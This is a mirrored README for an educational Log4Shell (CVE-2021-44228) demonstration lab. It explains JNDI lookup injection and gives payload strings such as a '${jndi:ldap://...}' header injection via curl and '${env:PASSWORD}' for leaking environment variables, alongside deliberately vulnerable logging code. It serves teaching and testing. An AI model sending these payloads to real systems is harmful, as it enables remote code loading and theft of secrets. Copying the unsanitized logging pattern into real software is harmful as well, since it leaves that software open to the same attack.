Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source
https://github.com/alpacamybags118/log4j-cve-2021-44228-sample
Associated Vulnerability
Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
Sample docker-compose setup to show how this exploit works
Readme
# Example of log4j exploit

This repo has a working sample of abusing the recent [log4j exploit](https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance). It does not perform actual remote code execution, but shows you the ease at which a bad actor can have a vulnerable application call out to its own ldap server.

This uses the excellent log4j sample vulnerable app created christophetd: https://github.com/christophetd/log4shell-vulnerable-app

## Explanation

This vulnerability abuses the `lookup` functionality of log4j, specially the `jndi` which allows log4j to perform lookups from external hosts for data to input. This can be exploited to do anything from logging sensitive variables in the environment to executing code remotely.

Lookups are done for any text wrapped in `${}` when the logger is called. For example,

```
${jndi:ldap://someldapserver:1389/o=example}
```
would do a lookup on that LDAP server with the given query and output the result.

A more simple example that doesnt make use of jndi, but is still dangerous:

```
${env:PASSWORD}
```

This would print the contents of that environment variable into logs. Someone then with access to view those logs could extract sensitive data from the application.

## log4j Code

The code in log4j for this exploit to be abused is pretty straightforward. You just need to call the logger to log a given request property unsanitized. For example, you could log the contents of a `User-Agent`.

```
...
@GetMapping("/bad")
	public void Bad(@RequestHeader("User-Agent") String userAgent) {
    logger.info("Received User-Agent header " + userAgent);
	}
```

## Using this example

First, build the local ldap server:

```
docker build -t ldapnode .
```

Once built, bring up the whole stack by running

```
docker-compose up
```

Then, you can perform a request to the app, using the `x-api-version` header to inject the lookup

```
curl --request GET \
  --url http://localhost:8080/ \
  --header 'x-api-version: ${jndi:ldap://bad:1389/o=example}'
```

Using that request, you will see in the docker-compose logs, the ldap server will have been called:

```
bad_1    | ldap server has been called!
log4j_1  | 2021-12-14 02:43:11.657  INFO 1 --- [nio-8080-exec-2] HelloWorld                               : Received a request for API version com.sun.jndi.ldap.LdapCtx@201a609c
```

## What to do if you are impacted

Please see [this documentation](https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance) for resolution paths
File Snapshot

 [4.0K]  /data/pocs/a5badb99e4837ede43bb8aeab5289a2fdb41db4c
├── [ 227]  docker-compose.yml
├── [  82]  Dockerfile
├── [ 272]  index.js
├── [ 294]  package.json
├── [8.9K]  package-lock.json
└── [2.5K]  README.md

0 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →